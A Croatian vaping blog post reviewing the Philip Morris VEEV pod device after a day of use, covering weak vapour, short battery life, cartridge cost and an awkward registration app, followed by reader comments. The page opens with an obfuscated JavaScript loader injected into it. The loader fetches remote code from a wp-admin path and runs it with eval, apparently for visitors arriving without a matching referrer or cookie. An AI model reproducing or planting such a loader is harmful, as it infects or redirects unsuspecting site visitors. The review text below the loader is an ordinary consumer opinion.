;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
LED indikator baterije

VEEV vape uređaj – review nakon 24 sata

Jučerašnji inicijalni dojmovi o VEEV vape uređaj duhanskog giganta Philip Morris su više nego dobri. No kako je prošao na 24 satnom testu – pročitajte u nastavku.

Prije svega samo kratak ispravak od jučer – ipak se refill patrona ne može staviti bilo kako. Mora se gurnuti u uređaj na način da mala strelica bude usmjerena prema LED indikatoru baterije. U protivnome uređaj ne radi.

Sam review će biti više orijentiran na korisnički doživljaj, usporedbu s nekim drugim uređajima. Review nekakvih tehničkih karakteristika i kako je sam uređaj izveden će napisati kolega Viktor.

Par riječi o meni

Čisto da bi mogli staviti ovaj review u nekakav kontekst morao bi ukratko napisati što inače koristim.

Parim restricted direct lung (RDL). Znači ne volim u potpunosti zatvorene sisteme i male otvore za zrak. Ne volim niti izrazito otvorene atomizere s puno zraka. Recimo da volim nešto u sredini što više naginje na mouth to lung način parenja. Dakle da ima zraka, ali parim mouth to lung.

Od aroma najčešće koristim duhane ili duhane u kombinaciji s nečim.

Parim 10-12 mg, i poparim od prilike do 10 ml e tekućine dnevno.

Moje navike što se tiče parenja se nisu previše promijenile otkako sam počeo parit. Oduvijek parim RDL. Prije sam pario 18mg, sada parim 9-10-12. Prethodno tome sam pušio jednu do jednu i pol kutiju cigareta dnevno ili motao duhane.

Manje nikotina od navedenog me ne zadovoljava, moram češće koristiti e cigaretu što ne želim.

Za početnike koji će ovo čitati – ja nisam nikakav napredni vaper. Moje znanje o tehnologiji i izradi je minimalno tek dovoljno da mogu koristiti uređaj. Čak i moja izrada grijača često bude predmet sprdnje kolega jer niti u tome nisam pretjerano spretan – ali radi i meni dobro.

Nemam vape kolekciju, 50 okusa i slično. Imam nešto sitno opreme, al spram nekih drugih to je ništa. Koristim jedan uređaj koji je meni dimenzijama prihvatljiv, jedan atomizer koji radi kako meni odgovara i jednu tekućinu dok je ne potrošim.

SLIMS banner

Let the games begin

S obzirom na sve gore navedeno, odnosno način kako ja parim, na žalost mene VEEV vape uređaj ne bi zadovoljio.

Ako se vratim u svoje početke parenja – imao sam dva pokušaja. Prvi je bio 2013. godine koristeći “cigalike” uređaje vjerojatno prve generacije. Ti uređaji su imali slabu generaciju pare, prozračnu paru koja ne daje onu ponoću u ustima te sam morao zbog niskog udjela nikotina češće povlačiti paru. To sve je uzrokovalo nadraženost jezika i bol vratnih žila zbog naprezanja prilikom pokušaja udisanja pare.

Veev vape uređaj
Cigalike uređaj

Drugi uređaj s kojim sam i prestao pušiti je CE4 2014. godine. On je imao dobru generaciju pare, solidno prenosio okus i mogao sam kontrolirati koliko nikotina parim te sam pario 18mg. To me odviklo od pušenja.

Doživljaj korištenja kakav daje VEEV vape uređaj bi usporedio sa ovim “cigalike” uređajem. Mene na žalost to ne zadovoljava.

Javlja mi se ponovo onaj isti problem. Ne osjetim težinu pare, ne osjetim djelovanje nikotina (iako je 18mg). Ponovo moram posezati za uređajem više puta, ponovo se javlja peckanje i nelagoda jezika te bol u vratu zbog naprezanja.

Ono što se na internet stranicama VEEV vape uređaja posebno naglašava je konstantno ista aroma za vrijeme parenja.
S jedne strane je to točno, okus je isti. No ukoliko želite više pare morate chain vapeat odnosno udisat paru uzastopno više puta. Tada tek nakon 10-15 povlačenja coil se dovoljno zagrije i tekućina dodatno razrijedi da bi mogao isporučiti mrvicu topliju i nešto gušću paru (u smislu da je više ima). Al to je stvarno mrvicu više.

VEEV vape uređaj – trajanje baterije

Posebno mi je bilo iritantno to što se uređaj gasi sam od sebe svako malo. Ako ga odložim na minutu – moram ga ponovo palit (držat power gumb 1 sekundu). S obzirom da sam naviknuo na regularni vape koji mi stoji na stolu, kad poželim automatski uzmem, povučem paru, odložim. Niti ne razmišljam o tom procesu. S VEEV vape uređajem to nije tako.

I uz to sve baterija je bila gotova do 12 sati popodne. Koristio sam uređaj od 7 do 12. Doduše nešto intenzivnije jer me na žalost generacija pare i nikotin nisu zadovoljili uz jutarnju kavu i posao.

Vibraciju uređaja mi ne donosi nikakve posebne prednosti. Više bi volio da baterija traje duže umjesto da vibrira. S druge strane vibracija vam daje do znanja da se nešto dešava odnosno da povlačite paru. S obzirom da uređaj generira toliko malo pare i s obzirom da je ta para izuzetno prozračna vibracija vam daje do znanja da uređaj radi. Da nema te vibracije dešavalo bi se to da povlačite zrak, i prekasno doznate da se uređaj u biti ugasio.

No baterija se relativno brzo puni – 30 minuta. I moguće je koristiti uređaj dok je na punjaču, ako vam je punjač na stolu i za to imate potrebe.

Prema mom načinu korištenja, morao bi puniti uređaj dva puta dnevno. No to je individualno, netko ko će uređaj koristiti manje – naravno baterija će trajati duže.

Koliko traje jedna VEEV patrona

Jedna od najčešćih pitanja korisnika početnika je “koliko je to kutija cigareta”. Kod regularnih e cigareta više manje znamo – 10ml e tekućine je od prilike dvije do tri kutije cigareta. No, s obzirom na specifičnost parenja i e cigareta uvijek se naglasi da je to individualno. Jer naravno koliko ćete pariti toliko ćete potrošiti.

Kod regularnih e cigareta i tekućina je prednost to što možete kontrolirati količinu nikotina, ovdje baš i ne. Znači ako kupite regularnu e cigaretu i 6ml e tekućinu i vidite da stalno posežete za e cigaretom – drugi puta jednostavno kupite 12mg. Kod Veeva je to nemoguće.

Patronu sam potrošio unutar 8 sati korištenja. No kažem, to je individualno. Netko tko će koristiti uređaj manje – sporije će potrošiti patronu.

Skup “sport”

Cijena po kojoj smo mi kupili navedeni uređaj je 200 kn. Kako uz njega ne dolaze pune patrone morali smo kupiti i patrone. Kutijica s dvije patrone košta 30kn.

Ako stavimo to u kontekst e cigareta pa čak istog tipa – za 200 kn već možete birati u čitavom mnoštvu PODova istih ili sličnih dimenzija i oblika.

Što se tiče cijene tekućina. Osobno potrošim jednu bočicu od 120 ml unutar mjesec dana. Trošak je dakle oko 120 kn mjesečno. Da koristim VEEV, i recimo da ga koristim normalnije, trošio bi od prilike sigurno jednu patronu dnevno. Drugim riječima oko 450 kn mjesečno.

VEEV vape uređaj – Mobilna aplikacija

Na samo uređaju i web stranici proizvođača stoji poziv da se registrirate i skinete njihovu aplikaciju. Sam prodavač je nekoliko puta to naglasio.

Skidanjem i korištenjem aplikacije kako bi se mijenjale funkcije uređaja staje priča o jednostavnosti korištenja.

Čim ja moram nešto skidat, nešto čačkat, imat mobilnu aplikaciju to u očima korisnika postaje već nešto kompleksnija priča. U tom momentu u prednost dolaze uređaji koji rade kako treba out of the box. E cigarete gdje ne morate ništa dodatno podešavati.

Sama aplikacija zahtjeva proces registracije. Skenirate QR kod koji vas vodi na stranicu, upisujete username i password, upisujete svoje ime, prezime, datum rođenja, spol, broj telefona… ali čekaj malo – ja ne želim to sve upisivati da bi mogao koristiti uređaj!

Zašto bi ja nekome davao svoj broj telefona i sve te podatke da bi na kraju samo vejpo? S obzirom da nisam kliknuo na “obavijestite me o novim proizvodima” kućicu, nadam se da me nitko neće zvat.

No dobro. Philip Morrisu trebaju svi ti podaci da bi pratili gdje su prodali uređaje, koliko su ih prodali, tko su korisnici kako pare itd itd.

E onda skeniraj novi QR kod uređaja. Di je taj QR kod. Čačkam po kutiji, ok ima još nekoliko QR kodova. Aplikacija na stranici ne želi otvoriti QR čitač iako sam dao dopuštenje da se koristi kamera. Idem probat upisat ručno. Gdje je šifra? Upisujem neku šifru slova i brojeva, e to nije to. Vjerojatno velika i mala slova.

OK na kraju palim aplikaciju na mobu za čitanje QR kodova, ono kao zasebnu aplikaciju. Mislim u ovom momentu veliki broj korisnika odustaje, ostaju entuzijasti koje to zanima.

Otvara se dio stranice gdje piše uređaj, serijski broj i do kad vrijedi garancija. Klikom na uredi imam opciju obrisati uređaj ili odustati. Di je aplikacija za podešavanje?

Surfam po webstranici, aha, Veev aplikacija. OK idemo, install. Opet kolko sam star, opet logiranje. Kliknem log in – baca me na log in. OK opet logiranje, ok logiram se drugi put. Otvara se mini web site app stile. Na početnoj stranici aplikacije ne vidim gdje dodam uređaj. Opet moram surfat po stranici da otkrijem. Cijelo vrijeme čitam sve što piše na stranici, bez da vidim gdje konkretno vidim opcije uređaja. Vrlo iritantno. Iiiii odustajem.

Sada već ironija navire kroz prste dok ovo pišem jer ništa tu više nije jednostavno.

Pretpostavljam da se ovdje radi o razini moje informatičke (ne)pismenosti i ja jednostavno ne mogu pronači taj dio gdje se upravlja uređajem na samoj aplikaciji. Siguran sam da ostali korisnici neće imati s time problema.

VEEV vape uređaj – zaključak

Iskreno očekivao sam više.

Kako piše na stranicama proizvođača “Napredan uređaj”, “400 znanstvenika, tisuće patenata, milijarde dolara, 6 godina istraživanja u Švicarskoj”. Da bi na kraju dobili POD kao i svaki drugi. Ja se ispričavam ali realno je tako.

Na žalost ne bi deklarirao uređaj kao ništa manje ili više napredan od standardnih POD uređaja. Dal se iza svega toga krije nekakva SF tehnologija kao korisniku mi je apsolutno nebitno. Ta tehnologija ni na koji način ne utječe na moj doživljaj korištenja uređaja spram ostalih te vrste koje sam imao prilike probati.

Napredna tehnologija sprječavanja pregrijavanja je vrlo vjerojatno temperature control, što ima svaki MOD zadnjih 4 godine. Grijač je vjerojatno SS. SS žica mijenja otpor kako se coil zagrijava. Čip očitava taj otpor i regulira količinu isporučene struje ne bi li taj otpor bio konstantan. Ako nema tekućine koja hladi grijač – temperatura grijača raste, samim time se mijenja otpor – čip gasi e cigaretu zbog pregrijavanja. Simple tehnologija koja postoji, na žalost ništa novog.

Eventualne dodatne funkcije uređaja koji se možda povezuje sa aplikacijom putem bluetootha ili wifia nisam uspio otkriti jer nisam dovoljno informatički obrazovan da bi to mogao pronači.

Čitajuči na njihovom websiteu što aplikacija nudi:
– opcije vibracije – koje sam naveo u startu da me ne interesiraju
– dvije veličine oblaka – vjerojatno se da podesiti da radi na višoj temperaturi čime se automatski e tekućina troši više.
No ne znam, nisam probao.

Prednosti
– kvaliteta izrade
– male dimenzije
– dobar okus Classic Auburn tekućine
– jednostavnost korištenja “out of the box”

Nedostaci
– slaba generacija pare
– para je hladna i prozračna
– 18mg nikotina me ne zadovoljava
– uređaj se stalno gasi
– baterija kratko traje
– cijena
– mobilna aplikacija?!?

Ovaj review je moje osobno mišljenje o uređaju. To ne znači da se uređaj neće vama svidjeti ili da vama neće upravo takva vrsta uređaja odgovarati.

Korištenje bilo koje e cigarete – uključujući i ovu – je korak u dobrom smjeru. E cigarete nisu bez rizika, no taj rizik je znatno manji nego kod regularnih cigareta. Odviknite se od pušenja s bilo čime i na bilo koji način i to čim prije.

Svakako nas pratite svaki petak u Vaper Pub Friday Night Live Streamu na Vaper Pub Youtube kanalu.

Choose your Reaction!
 • Vjerojatno oni moraju natrkeljati sve i svašta da bi opravdali uloženi novac od raznoraznih sponzora a uređaj kao i svaki drugi POD malo bolji ili malo gori ovisno ko je šta probao
  Jedino što me smeta kod toga je to što netko u nekom trenutku odluči probati paru i kupi nekakav šrot pa slijedom toga generalizra da je to sve isti k….
  A ne možeš ga krstiti i uvjeriti da proba nešto drugo nego udri i dalje po čikovima

  • Bas to sto kazes.
   Jedva sam muza nagovorila da proba jer je prije 11 godina imao onu ecigaretu, valjda prve sta su izasle. “ja sam probao,to je bezveze, nist ne valja”. Srecom pa sam ja uporno dubre, i eto ga sad bez pljugi dva mjeseca.

 • “400 znanstvenika, tisuće patenata, milijarde dolara, 6 godina istraživanja u Švicarskoj” – čitaj “pratili smo druge (Kineze) 6 godina što rade i prekopirali sve – ali lošije” :D

 • Moje osobno mišljenje nakon kratke probe danas: Ovo nema veze sa ostalim pod uređajima. Velika večina podova daje puno bolje iskustvo parenja. Veev daje toliko malu neosjetnu količinu pare i aromu koja se gore spominje gotovo da nisam osjetila koliko je slaba. Što se tiče nikotina, piše da je ta tekućina 18mg; ja na 18mg trenutno padam u nesvijest, jer već jako dugo na MTL-u parim 6mg, a na DL-u parim 2mg. Nikotin iz ove Veev tekućine nisam niti osjetila. Jedino što ja mogu pohvaliti jest dizajn

Leave a Comment